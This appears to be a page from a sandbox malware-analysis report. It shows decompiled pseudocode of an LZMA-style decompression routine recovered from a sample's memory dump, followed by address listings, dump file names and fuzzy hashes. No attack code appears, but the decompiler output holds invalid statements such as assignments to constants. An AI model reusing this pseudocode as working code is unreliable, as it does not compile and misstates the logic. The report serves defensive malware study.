														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040711c
0x0040711c
0x00407120
0x0040712d
0x00407137
0x00000000
0x00407122
0x00407122
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407120

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
